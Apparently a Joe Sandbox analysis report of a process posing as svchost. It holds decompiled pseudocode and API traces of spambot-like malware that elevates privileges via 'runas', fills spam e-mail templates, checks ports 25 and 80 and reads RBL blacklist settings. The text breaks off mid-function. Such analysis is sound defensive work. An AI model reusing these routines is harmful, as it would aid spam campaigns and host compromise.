                                                                                • GetModuleHandleA.KERNEL32(iphlpapi.dll,74D0EA30,?,000DBBA0,?,00000000,00122F0F,?,001220FF,00132000), ref: 00122E01
                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00122F0F,?,001220FF,00132000), ref: 00122E11
                                                                                • GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 00122E2E
                                                                                • GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00122F0F,?,001220FF,00132000), ref: 00122E4C
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00122F0F,?,001220FF,00132000), ref: 00122E4F
                                                                                • htons.WS2_32(00000035), ref: 00122E88
                                                                                • inet_addr.WS2_32(?), ref: 00122E93
                                                                                • gethostbyname.WS2_32(?), ref: 00122EA6
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00122F0F,?,001220FF,00132000), ref: 00122EE3
                                                                                • HeapFree.KERNEL32(00000000,?,00000000,00122F0F,?,001220FF,00132000), ref: 00122EE6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                • String ID: GetNetworkParams$iphlpapi.dll
                                                                                • API String ID: 929413710-2099955842
                                                                                • Opcode ID: 32ad65aba048c85fd81ee8a259d2d00032404fd58fced7cd75eabd4ef10416ff
                                                                                • Instruction ID: 174e989b853b063bbd13ace1414e122980f71bffa2ee901447f8b2a82185527e
                                                                                • Opcode Fuzzy Hash: 32ad65aba048c85fd81ee8a259d2d00032404fd58fced7cd75eabd4ef10416ff
                                                                                • Instruction Fuzzy Hash: E531E831A00619BBDF119FB8AC58AAF77B8AF08760F160115F914E72A0D730DD91AB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 77%
                                                                                			E00129326(void* __ecx, void* __edx) {
                                                                                				void* __ebx;
                                                                                				char _t88;
                                                                                				void* _t89;
                                                                                				int _t92;
                                                                                				void* _t96;
                                                                                				signed int _t97;
                                                                                				signed int _t100;
                                                                                				signed int _t103;
                                                                                				char* _t106;
                                                                                				char* _t111;
                                                                                				signed int _t112;
                                                                                				char* _t116;
                                                                                				signed int _t117;
                                                                                				int _t119;
                                                                                				void* _t146;
                                                                                				signed int _t155;
                                                                                				int _t161;
                                                                                				signed int _t165;
                                                                                				signed int _t167;
                                                                                				void* _t168;
                                                                                				void* _t170;
                                                                                				void* _t172;
                                                                                				void* _t173;
                                                                                				void* _t175;
                                                                                				void* _t176;
                                                                                
                                                                                				_t146 = __ecx;
                                                                                				_t168 = _t170 - 0x60;
                                                                                				E00121910(0x19bc);
                                                                                				 *(_t168 - 0x58) = 0x9c;
                                                                                				if(GetVersionExA(_t168 - 0x58) == 0) {
                                                                                					 *(_t168 - 0x4c) =  *(_t168 - 0x4c) & 0x00000000;
                                                                                					_t9 = _t168 + 0x58;
                                                                                					 *_t9 =  *(_t168 + 0x58) & 0x00000000;
                                                                                					__eflags =  *_t9;
                                                                                				} else {
                                                                                					 *(_t168 + 0x58) = ( *(_t168 - 0x54) << 4) +  *((intOrPtr*)(_t168 - 0x50));
                                                                                				}
                                                                                				_t88 = GetModuleFileNameA(GetModuleHandleA(0), _t168 - 0x15c, 0x104);
                                                                                				if(_t88 == 0) {
                                                                                					 *(_t168 - 0x15c) = _t88;
                                                                                				}
                                                                                				_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                				_t89 = _t168 - 0x15c;
                                                                                				if( *(_t168 + 0x78) == 0) {
                                                                                					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                					_push(_t89);
                                                                                					_push( *((intOrPtr*)(_t168 + 0x68)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x6c)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                					_t92 = wsprintfA(_t168 - 0x95c, E00122544(0x1322f8,  &E00130918, 0xbd, 0xe4, 0xc8));
                                                                                					_t172 = _t170 + 0x40;
                                                                                				} else {
                                                                                					_push(_t89);
                                                                                					_push( *((intOrPtr*)(_t168 + 0x68)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x6c)));
                                                                                					_t92 = wsprintfA(_t168 - 0x95c, E00122544(0x1322f8, 0x1309d8, 0x4d, 0xe4, 0xc8));
                                                                                					_t172 = _t170 + 0x38;
                                                                                				}
                                                                                				 *(_t168 + 0x78) = _t92;
                                                                                				E0012EE2A(_t146, 0x1322f8, 0, 0x100);
                                                                                				_t173 = _t172 + 0xc;
                                                                                				if( *(_t168 + 0x58) >= 0x60 &&  *((intOrPtr*)(_t168 + 0x7c)) != 0) {
                                                                                					E0012EF00(_t168 - 0x15c, E00126CC9(_t146));
                                                                                					E0012EF1E(_t168 - 0x15c, E00122544(0x1322f8,  &E0013090C, 0xc, 0xe4, 0xc8));
                                                                                					_push(_t168 - 0x15c);
                                                                                					wsprintfA(_t168 +  *(_t168 + 0x78) - 0x95c, E00122544(0x1322f8,  &E00130888, 0x82, 0xe4, 0xc8));
                                                                                					E0012EE2A(_t146, 0x1322f8, 0, 0x100);
                                                                                					_t173 = _t173 + 0x50;
                                                                                				}
                                                                                				 *(_t168 + 0x78) =  *(_t168 + 0x78) & 0x00000000;
                                                                                				 *(_t168 + 0x5c) = E00126EDD();
                                                                                				if( *(_t168 + 0x58) < 0x60) {
                                                                                					_t165 =  *(_t168 + 0x78);
                                                                                					_t161 = 0;
                                                                                					__eflags = 0;
                                                                                					L33:
                                                                                					__eflags =  *(_t168 + 0x5c) - _t161;
                                                                                					if( *(_t168 + 0x5c) == _t161) {
                                                                                						L38:
                                                                                						_push(_t168 - 0x95c);
                                                                                						_push(_t161);
                                                                                						L39:
                                                                                						_t96 = E001291EB();
                                                                                						__eflags =  *0x132180 - _t161; // 0x0
                                                                                						if(__eflags != 0) {
                                                                                							 *0x132180 =  *0x132180 | _t165;
                                                                                							__eflags =  *0x132180;
                                                                                						}
                                                                                						__eflags = _t96 - 0x2a;
                                                                                						_t81 = _t96 == 0x2a;
                                                                                						__eflags = _t81;
                                                                                						_t97 = 0 | _t81;
                                                                                						L42:
                                                                                						return _t97;
                                                                                					}
                                                                                					_t100 = E00121820(_t168 + 0x54, _t168 + 0x78);
                                                                                					__eflags = _t100;
                                                                                					if(_t100 != 0) {
                                                                                						_push(_t168 - 0x95c);
                                                                                						_push("runas");
                                                                                						goto L39;
                                                                                					}
                                                                                					_t103 =  *(_t168 + 0x78) | 0x61040000;
                                                                                					__eflags = _t103;
                                                                                					 *0x132180 = _t103;
                                                                                					 *0x13217c =  *(_t168 + 0x54);
                                                                                					if(_t103 != 0) {
                                                                                						 *0x132180 = _t103 | _t165;
                                                                                					}
                                                                                					L31:
                                                                                					_t97 = 0;
                                                                                					goto L42;
                                                                                				}
                                                                                				 *(_t168 + 0x4c) = 4;
                                                                                				 *(_t168 + 0x44) = 5;
                                                                                				 *(_t168 + 0x48) = 1;
                                                                                				_t106 = E00122544(0x1322f8,  &E0013084C, 0x3a, 0xe4, 0xc8);
                                                                                				_t175 = _t173 + 0x14;
                                                                                				if(RegOpenKeyExA(0x80000002, _t106, 0, 0x101, _t168 + 0x50) == 0) {
                                                                                					_t111 = E00122544(0x1322f8, 0x130830, 0x1b, 0xe4, 0xc8);
                                                                                					_t176 = _t175 + 0x14;
                                                                                					_t112 = RegQueryValueExA( *(_t168 + 0x50), _t111, 0, _t168 + 0x54, _t168 + 0x44, _t168 + 0x4c);
                                                                                					__eflags = _t112;
                                                                                					if(_t112 == 0) {
                                                                                						_t116 = E00122544(0x1322f8, 0x130818, 0x16, 0xe4, 0xc8);
                                                                                						_t176 = _t176 + 0x14;
                                                                                						_t117 = RegQueryValueExA( *(_t168 + 0x50), _t116, 0, _t168 + 0x54, _t168 + 0x48, _t168 + 0x4c);
                                                                                						__eflags = _t117;
                                                                                						if(_t117 != 0) {
                                                                                							 *(_t168 + 0x78) = 0x3000;
                                                                                						}
                                                                                					} else {
                                                                                						 *(_t168 + 0x78) = 0x2000;
                                                                                					}
                                                                                					RegCloseKey( *(_t168 + 0x50));
                                                                                					_t165 =  *(_t168 + 0x78);
                                                                                				} else {
                                                                                					_t165 = 0x1000;
                                                                                				}
                                                                                				_t161 = 0;
                                                                                				if( *(_t168 + 0x44) != 0 ||  *(_t168 + 0x48) != 0) {
                                                                                					if( *(_t168 + 0x5c) <= _t161) {
                                                                                						goto L38;
                                                                                					}
                                                                                					_t119 =  *(_t168 - 0x4c);
                                                                                					if( *(_t168 + 0x58) < 0x61 || _t119 < 0x1db0) {
                                                                                						 *0x13217c = _t119;
                                                                                						_t167 = _t165 | 0x61040106;
                                                                                						__eflags = _t167;
                                                                                						goto L30;
                                                                                					} else {
                                                                                						if(E0012F0E4(_t168 - 0x95c, _t168 - 0x195c, 0x800) == 0) {
                                                                                							 *0x13217c = _t161;
                                                                                							_t167 = _t165 | 0x61040107;
                                                                                							L30:
                                                                                							 *0x132180 = _t167;
                                                                                							goto L31;
                                                                                						}
                                                                                						_t97 = E001218E0(0xc8, _t168 - 0x195c, _t168 + 0x5c, _t168 + 0x78);
                                                                                						if(_t97 == _t161) {
                                                                                							_t155 =  *(_t168 + 0x78) | 0x61040000;
                                                                                							 *0x132180 = _t155;
                                                                                							 *0x13217c =  *(_t168 + 0x5c);
                                                                                							if(_t155 != 0) {
                                                                                								 *0x132180 = _t155 | _t165;
                                                                                							}
                                                                                						}
                                                                                						goto L42;
                                                                                					}
                                                                                				} else {
                                                                                					goto L33;
                                                                                				}
                                                                                			}
                                                                                0x00129692
                                                                                0x00129692
                                                                                0x00129692
                                                                                0x0012969a
                                                                                0x0012969d
                                                                                0x0012969d
                                                                                0x001296a0
                                                                                0x001296a2
                                                                                0x001296a9
                                                                                0x001296a9
                                                                                0x00129641
                                                                                0x00129648
                                                                                0x0012964a
                                                                                0x00129673
                                                                                0x00129674
                                                                                0x00000000
                                                                                0x00129674
                                                                                0x00129652
                                                                                0x00129652
                                                                                0x00129657
                                                                                0x0012965c
                                                                                0x00129662
                                                                                0x00129666
                                                                                0x00129666
                                                                                0x0012962b
                                                                                0x0012962b
                                                                                0x00000000
                                                                                0x0012962b
                                                                                0x001294ce
                                                                                0x001294d5
                                                                                0x001294dc
                                                                                0x001294e3
                                                                                0x001294e8
                                                                                0x001294f9
                                                                                0x0012951a
                                                                                0x0012951f
                                                                                0x00129526
                                                                                0x0012952c
                                                                                0x0012952e
                                                                                0x00129551
                                                                                0x00129556
                                                                                0x0012955d
                                                                                0x00129563
                                                                                0x00129565
                                                                                0x00129567
                                                                                0x00129567
                                                                                0x00129530
                                                                                0x00129530
                                                                                0x00129530
                                                                                0x00129571
                                                                                0x00129577
                                                                                0x001294fb
                                                                                0x001294fb
                                                                                0x001294fb
                                                                                0x0012957a
                                                                                0x0012957f
                                                                                0x0012958d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00129597
                                                                                0x0012959a
                                                                                0x0012961a
                                                                                0x0012961f
                                                                                0x0012961f
                                                                                0x00000000
                                                                                0x001295a3
                                                                                0x001295c0
                                                                                0x0012960c
                                                                                0x00129612
                                                                                0x00129625
                                                                                0x00129625
                                                                                0x00000000
                                                                                0x00129625
                                                                                0x001295d1
                                                                                0x001295db
                                                                                0x001295e7
                                                                                0x001295ed
                                                                                0x001295f3
                                                                                0x001295f9
                                                                                0x00129601
                                                                                0x00129601
                                                                                0x001295f9
                                                                                0x00000000
                                                                                0x001295db
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • GetVersionExA.KERNEL32(?,?,00129DD7,?,00000022,?,?,00000000,00000001), ref: 00129340
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00129DD7,?,00000022,?,?,00000000,00000001), ref: 0012936E
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00129DD7,?,00000022,?,?,00000000,00000001), ref: 00129375
                                                                                • wsprintfA.USER32 ref: 001293CE
                                                                                • wsprintfA.USER32 ref: 0012940C
                                                                                • wsprintfA.USER32 ref: 0012948D
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 001294F1
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00129526
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00129571
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                • String ID: runas
                                                                                • API String ID: 3696105349-4000483414
                                                                                • Opcode ID: 346b1dd0f00313d5d054740cd60c6d58b4274f46b67643b5db7c77e9ad18d414
                                                                                • Instruction ID: 16d4e71810100553a555e71b56e6dea02dfa5f5f5e69c742fe9864fbe9bf5eb8
                                                                                • Opcode Fuzzy Hash: 346b1dd0f00313d5d054740cd60c6d58b4274f46b67643b5db7c77e9ad18d414
                                                                                • Instruction Fuzzy Hash: 3CA17EB2900218EFEB25DFA5EC85FDE3BACEB18740F104066FA0596151E775D994CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 78%
                                                                                			E0012B3C5(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                				char _v132;
                                                                                				void* _t46;
                                                                                				char* _t71;
                                                                                				intOrPtr _t72;
                                                                                				intOrPtr _t73;
                                                                                				intOrPtr _t75;
                                                                                				void* _t76;
                                                                                				void* _t77;
                                                                                
                                                                                				E00125CE1(_a4, 0x3e800, _a16, 0, 0);
                                                                                				E0012EF00( &_v132, "%FROM_EMAIL");
                                                                                				E00125CE1( &_v132, 0x64, _a16, 0, 0);
                                                                                				_t71 = E0012ED03( &_v132, 0x40);
                                                                                				_t77 = _t76 + 0x38;
                                                                                				_t83 = _t71;
                                                                                				if(_t71 != 0) {
                                                                                					_t7 = _t71 + 1; // 0x1
                                                                                					E0012EF7C(_t83, _a4, "%FROM_DOMAIN", _t7, 0x3e800, 0);
                                                                                					 *_t71 = 0;
                                                                                					E0012EF7C(_t83, _a4, "%FROM_USER",  &_v132, 0x3e800, 0);
                                                                                					_t77 = _t77 + 0x28;
                                                                                				}
                                                                                				_t72 = _a12;
                                                                                				E0012EF7C(_t83, _a4, "%TO_DOMAIN",  *((intOrPtr*)(_t72 + 0xc)), 0x3e800, 0);
                                                                                				wsprintfA( &_v132, "%s@%s",  *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
                                                                                				E0012EF7C(_t83, _a4, "%TO_EMAIL",  &_v132, 0x3e800, 0);
                                                                                				_t73 = _a4;
                                                                                				E0012EF7C(_t83, _t73, "%TO_USER",  *((intOrPtr*)(_t72 + 4)), 0x3e800, 0);
                                                                                				_t46 = E0012F0CB( &_v132);
                                                                                				_push(0);
                                                                                				_push( &_v132);
                                                                                				_push(_t46);
                                                                                				E0012F133();
                                                                                				E0012EF7C(_t83, _t73, "%TO_HASH",  &_v132, 0x3e800, 0);
                                                                                				_push(_t73);
                                                                                				E0012AD89( &_v132, _t83);
                                                                                				E0012B211(0,  &_v132, 0);
                                                                                				E0012EF7C(_t83, _t73, "%DATE",  &_v132, 0x3e800, 0);
                                                                                				E0012B211(0,  &_v132, 5);
                                                                                				E0012EF7C(_t83, _t73, "%P5DATE",  &_v132, 0x3e800, 0);
                                                                                				E0012B211(0,  &_v132, 0xfffffffb);
                                                                                				E0012EF7C(_t83, _t73, "%M5DATE",  &_v132, 0x3e800, 0);
                                                                                				_t75 = _a8;
                                                                                				 *((char*)(E0012AEDD(_t75, _t73, 0x3e800) + _t75)) = 0;
                                                                                				return _t75;
                                                                                			}

                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 0012B467
                                                                                  • Part of subcall function 0012EF7C: lstrlenA.KERNEL32(?,?,00000000,?,?), ref: 0012EF92
                                                                                  • Part of subcall function 0012EF7C: lstrlenA.KERNEL32(?), ref: 0012EF99
                                                                                  • Part of subcall function 0012EF7C: lstrlenA.KERNEL32(00000000), ref: 0012EFA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$wsprintf
                                                                                • String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
                                                                                • API String ID: 1220175532-2340906255
                                                                                • Opcode ID: c44c77db0b8397b16c6f5eb57f92ece4f68dabb132fddbf1763d0fa47ce51086
                                                                                • Instruction ID: ad58d7f09184e78166d81a0cc0c643094abd6aef95ec88d9dadc702e2ef6048c
                                                                                • Opcode Fuzzy Hash: c44c77db0b8397b16c6f5eb57f92ece4f68dabb132fddbf1763d0fa47ce51086
                                                                                • Instruction Fuzzy Hash: 66416DB254022C7EEF01ABA4EDC2CFF7BACEF59748F140115F904A2142DB30AE2597A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E00122011() {
                                                                                				long _t35;
                                                                                				void* _t45;
                                                                                				intOrPtr _t47;
                                                                                				void* _t51;
                                                                                				char* _t53;
                                                                                				char* _t58;
                                                                                				intOrPtr _t96;
                                                                                				signed int _t102;
                                                                                				signed int _t103;
                                                                                				void* _t104;
                                                                                				void* _t122;
                                                                                
                                                                                				if(( *0x1322f4 & 0x00000001) == 0) {
                                                                                					 *0x1322f4 =  *0x1322f4 | 0x00000001;
                                                                                					 *0x1322f0 = E0012F04E(0);
                                                                                				}
                                                                                				if(( *0x1322f4 & 0x00000002) == 0) {
                                                                                					 *0x1322f4 =  *0x1322f4 | 0x00000002;
                                                                                					 *0x1322ec = E0012F04E(0);
                                                                                				}
                                                                                				if(( *0x1322f4 & 0x00000004) == 0) {
                                                                                					 *0x1322f4 =  *0x1322f4 | 0x00000004;
                                                                                					 *0x1322e8 = E0012F04E(0);
                                                                                				}
                                                                                				_t35 = GetTickCount();
                                                                                				_t96 =  *((intOrPtr*)(_t104 + 0x114));
                                                                                				if(_t35 -  *0x1322e0 > 0xdbba0) {
                                                                                					_t58 =  *0x132000; // 0x130288
                                                                                					_t103 = 0;
                                                                                					if( *_t58 != 0) {
                                                                                						_t60 = 0x132000;
                                                                                						do {
                                                                                							if(E00122684( *_t60) == 0) {
                                                                                								goto L11;
                                                                                							} else {
                                                                                								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000004;
                                                                                								if(E00121978(_t61, 0x50) != 0) {
                                                                                									_t12 = _t96 + 0x14;
                                                                                									 *_t12 =  *(_t96 + 0x14) | 0x00000002;
                                                                                									__eflags =  *_t12;
                                                                                								} else {
                                                                                									goto L11;
                                                                                								}
                                                                                							}
                                                                                							goto L14;
                                                                                							L11:
                                                                                							_t103 = _t103 + 1;
                                                                                							_t60 = 0x132000 + _t103 * 4;
                                                                                						} while ( *((char*)( *(0x132000 + _t103 * 4))) != 0);
                                                                                					}
                                                                                					L14:
                                                                                					 *0x1322e0 = GetTickCount();
                                                                                				}
                                                                                				if(GetTickCount() -  *0x1322dc > 0xdbba0) {
                                                                                					_t53 =  *0x132000; // 0x130288
                                                                                					_t102 = 0;
                                                                                					if( *_t53 != 0) {
                                                                                						_t55 = 0x132000;
                                                                                						do {
                                                                                							if(E00122EF8( *_t55) == 0) {
                                                                                								goto L20;
                                                                                							} else {
                                                                                								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000008;
                                                                                								if(E00121978(_t56, 0x19) != 0) {
                                                                                									_t18 = _t96 + 0x14;
                                                                                									 *_t18 =  *(_t96 + 0x14) | 0x00000001;
                                                                                									__eflags =  *_t18;
                                                                                								} else {
                                                                                									goto L20;
                                                                                								}
                                                                                							}
                                                                                							goto L23;
                                                                                							L20:
                                                                                							_t102 = _t102 + 1;
                                                                                							_t55 = 0x132000 + _t102 * 4;
                                                                                						} while ( *((char*)( *(0x132000 + _t102 * 4))) != 0);
                                                                                					}
                                                                                					L23:
                                                                                					 *0x1322dc = GetTickCount();
                                                                                				}
                                                                                				 *(_t96 + 0x28) = GetTickCount() / 0x3e8;
                                                                                				 *((intOrPtr*)(_t96 + 0x2c)) = GetTickCount() / 0x3e8 -  *0x132110;
                                                                                				_t45 = E0012F04E(0) -  *0x1322f0;
                                                                                				_t93 = "localcfg";
                                                                                				_t122 = _t45 -  *0x1322e4; // 0x12c
                                                                                				if(_t122 > 0) {
                                                                                					E0012E854(1, "localcfg", "rbl_bl", _t104 + 0x18, 0x100, 0x130264);
                                                                                					_t51 = E0012E819(1, _t93, "rbl_ip", 0);
                                                                                					_t104 = _t104 + 0x28;
                                                                                					if(_t51 == 0) {
                                                                                						L28:
                                                                                						 *0x1322e4 = 0x12c;
                                                                                					} else {
                                                                                						_t124 =  *((intOrPtr*)(_t104 + 0x10));
                                                                                						if( *((intOrPtr*)(_t104 + 0x10)) == 0) {
                                                                                							goto L28;
                                                                                						} else {
                                                                                							_push(_t104 + 0x10);
                                                                                							_push(_t51);
                                                                                							 *((intOrPtr*)(_t96 + 0x38)) = E00121C5F(_t124);
                                                                                							 *0x1322e4 = 0x4b0;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				_t47 = E0012F04E(0) -  *0x1322f0;
                                                                                				if(_t47 > 0x4b0) {
                                                                                					E0012EA84(1, _t93, "net_type",  *(_t96 + 0x14));
                                                                                					_t47 = E0012F04E(0);
                                                                                					 *0x1322f0 = _t47;
                                                                                				}
                                                                                				return _t47;
			}

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00122078
                                                                                • GetTickCount.KERNEL32 ref: 001220D4
                                                                                • GetTickCount.KERNEL32 ref: 001220DB
                                                                                • GetTickCount.KERNEL32 ref: 0012212B
                                                                                • GetTickCount.KERNEL32 ref: 00122132
                                                                                • GetTickCount.KERNEL32 ref: 00122142
                                                                                  • Part of subcall function 0012F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0012E342,00000000,76A1F210,80000001,00000000,0012E513,?,00000000,00000000,?,000000E4), ref: 0012F089
                                                                                  • Part of subcall function 0012F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0012E342,00000000,76A1F210,80000001,00000000,0012E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0012F093
                                                                                  • Part of subcall function 0012E854: lstrcpyA.KERNEL32(00000001,?,?,0012D8DF,00000001,localcfg,except_info,00100000,00130264), ref: 0012E88B
                                                                                  • Part of subcall function 0012E854: lstrlenA.KERNEL32(00000001,?,0012D8DF,00000001,localcfg,except_info,00100000,00130264), ref: 0012E899
                                                                                  • Part of subcall function 00121C5F: wsprintfA.USER32 ref: 00121CE1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
                                                                                • String ID: localcfg$net_type$rbl_bl$rbl_ip
                                                                                • API String ID: 3976553417-1522128867
                                                                                • Opcode ID: a78f5bb04ad0ee85d8b924c79c384bc3c44fe026319a9775d485fbc947b001e1
                                                                                • Instruction ID: 764c08944396fb33f68c0307cfb5076ddd8a8236f2e00c1589b21368d4b11940
                                                                                • Opcode Fuzzy Hash: a78f5bb04ad0ee85d8b924c79c384bc3c44fe026319a9775d485fbc947b001e1
                                                                                • Instruction Fuzzy Hash: E451DE719043566EE729FF34FE46F6B3BE5EB14314F10002EF605869A2DBB498A8CA15
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E0012C2DC(void* __ebp, signed int _a4) {
                                                                                				void* _t86;
                                                                                				signed int _t90;
                                                                                				signed int _t91;
                                                                                				long _t93;
                                                                                				signed int _t95;
                                                                                				signed int _t101;
                                                                                				signed int _t108;
                                                                                				signed int _t112;
                                                                                				signed int _t115;
                                                                                				long _t117;
                                                                                				long _t118;
                                                                                				signed int _t120;
                                                                                				struct _SECURITY_ATTRIBUTES* _t122;
                                                                                				signed int _t123;
                                                                                				signed int _t132;
                                                                                				signed int _t148;
                                                                                				signed char _t151;
                                                                                				signed int _t154;
                                                                                				signed int _t156;
                                                                                				signed char* _t157;
                                                                                				void* _t158;
                                                                                				signed int _t163;
                                                                                
                                                                                				_t158 = __ebp;
                                                                                				_t157 = _a4;
                                                                                				E0012A4C7(_t157);
                                                                                				_t122 = 0;
                                                                                				if(_t157[0x44] == 0) {
                                                                                					_t157[8] = 0;
                                                                                					_t157[0x34] = 0;
                                                                                					_t157[0x38] = 0;
                                                                                					_t157[0x3c] = 0;
                                                                                					_t157[0x54] = 0;
                                                                                					_t157[0x40] = 0;
                                                                                					_t157[0x58] = 0;
                                                                                					L31:
                                                                                					_t82 =  &(_t157[4]); // 0x12c4e4
                                                                                					_t86 = _t82;
                                                                                					_t148 =  !( *_t157) & 0x00000001;
                                                                                					_t157[0x5c] = _t122;
                                                                                					_t84 =  &(_t157[8]); // 0xfffffdf0
                                                                                					if( *_t86 >=  *_t84) {
                                                                                						L34:
                                                                                						return _t86;
                                                                                					}
                                                                                					_t86 = CreateThread(_t122, _t122, E0012B535, InterlockedIncrement(_t86) | _t148 << 0x00000010, _t122, _t122);
                                                                                					if(_t86 == _t122) {
                                                                                						goto L34;
                                                                                					}
                                                                                					return CloseHandle(_t86);
                                                                                				}
                                                                                				if(_t157[8] != 0) {
                                                                                					__eflags = _t157[0x48];
                                                                                					if(_t157[0x48] == 0) {
                                                                                						L5:
                                                                                						_t12 =  &(_t157[0x10]); // 0x59be026a
                                                                                						_t90 =  *_t12;
                                                                                						_t157[8] = _t90;
                                                                                						_t157[0x34] = _t90;
                                                                                						_t91 = _t90 * 0x3e8;
                                                                                						__eflags = _t91;
                                                                                						_t157[0x38] = _t122;
                                                                                						_t157[0x3c] = _t122;
                                                                                						_t157[0x1c] = _t90 * 0x2710;
                                                                                						_t157[0x20] = _t91;
                                                                                						goto L6;
                                                                                					}
                                                                                					_t118 = GetTickCount();
                                                                                					_t11 =  &(_t157[0x48]); // 0x13740013
                                                                                					__eflags = _t118 -  *_t11 - 0x927c0;
                                                                                					if(_t118 -  *_t11 < 0x927c0) {
                                                                                						goto L6;
                                                                                					}
                                                                                					goto L5;
                                                                                				} else {
                                                                                					_t4 =  &(_t157[0xc]); // 0x5756c359
                                                                                					_t120 =  *_t4;
                                                                                					_t157[0x1c] = _t120 * 0x2710;
                                                                                					_t157[8] = _t120;
                                                                                					_t157[0x20] = _t120 * 0x3e8;
                                                                                					_t157[0x34] = _t120;
                                                                                					_t157[0x48] = GetTickCount();
                                                                                					L6:
                                                                                					if(( *_t157 & 0x00000001) == 0) {
                                                                                						_t73 =  &(_t157[0x34]); // 0xa1c35e5f
                                                                                						_t157[8] =  *_t73;
                                                                                						goto L31;
                                                                                					}
                                                                                					_t93 = GetTickCount();
                                                                                					_t21 =  &(_t157[0x4c]); // 0x26fce850
                                                                                					if(_t93 -  *_t21 >= 0x2710) {
                                                                                						goto L31;
                                                                                					}
                                                                                					if(_t157[0x54] == _t122) {
                                                                                						_t95 = 0x3e8;
                                                                                					} else {
                                                                                						_t117 = GetTickCount();
                                                                                						_t23 =  &(_t157[0x54]); // 0x13366c1d
                                                                                						_t95 = _t117 -  *_t23;
                                                                                					}
                                                                                					_t123 = _t95;
                                                                                					if(_t95 < 1) {
                                                                                						_t123 = 1;
                                                                                					}
                                                                                					if(_t123 > 0x4e20) {
                                                                                						_t123 = 0x4e20;
                                                                                					}
                                                                                					_t24 =  &(_t157[0x58]); // 0x701d8900
                                                                                					_t25 =  &(_t157[0x40]); // 0x74c33b57
                                                                                					_t151 =  *_t25;
                                                                                					_t132 =  *_t24 * 0x3e8;
                                                                                					_push(_t158);
                                                                                					asm("cdq");
                                                                                					_push(0x14);
                                                                                					_a4 = _t123;
                                                                                					asm("cdq");
                                                                                					_t101 = (_t132 - _t151) * _t123 / 0x3e8 / 0x3e8;
                                                                                					if(_t101 == 0) {
                                                                                						__eflags = _t132 - _t151;
                                                                                						if(__eflags == 0) {
                                                                                							goto L22;
                                                                                						}
                                                                                						if(__eflags >= 0) {
                                                                                							_t156 = _t151 + 1;
